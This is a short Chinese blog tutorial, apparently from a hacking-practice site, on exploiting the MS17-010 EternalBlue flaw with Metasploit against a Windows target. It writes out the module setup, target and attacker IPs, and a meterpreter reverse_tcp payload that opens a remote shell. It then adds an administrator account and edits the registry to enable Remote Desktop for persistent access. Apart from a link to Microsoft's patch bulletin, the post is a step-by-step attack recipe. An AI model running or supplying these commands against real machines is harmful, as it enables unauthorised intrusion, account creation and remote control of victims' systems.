利用msf的ms17_010模块提权

其实啊,这个东西没什么用

先参考下,更新补丁下载更新吧,几乎在座各位用的系统都有影响。(没补丁前)    https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

先启动msf

msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue //使用模块
show options //查看必要参数

1.PNG

set RHOST 192.168.1.100
set LHOST 192.168.1.132 //攻击机ip
set payload windows/x64/meterpreter/reverse_tcp //使用这个东西
run

2.PNG

5.PNG

cmd添加用户(不知道什么意思可以百度)

net user abc qwe+123 /add
net localgroup administrators abc /add

6.PNG

7.PNG

cmd写入注册表开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

8.PNG

接下来用刚刚创建的用户远程连接靶机

10.PNG

11.PNG

12.PNG

本文参考:

https://zhidao.baidu.com/question/128762189.html



kail除了msf还有很多工具,有兴趣自己了解。。。。推荐书本《Metasploit渗透测试魔鬼训练营》

none

发表评论

0条评论

设置
配色方案

布局

现在购买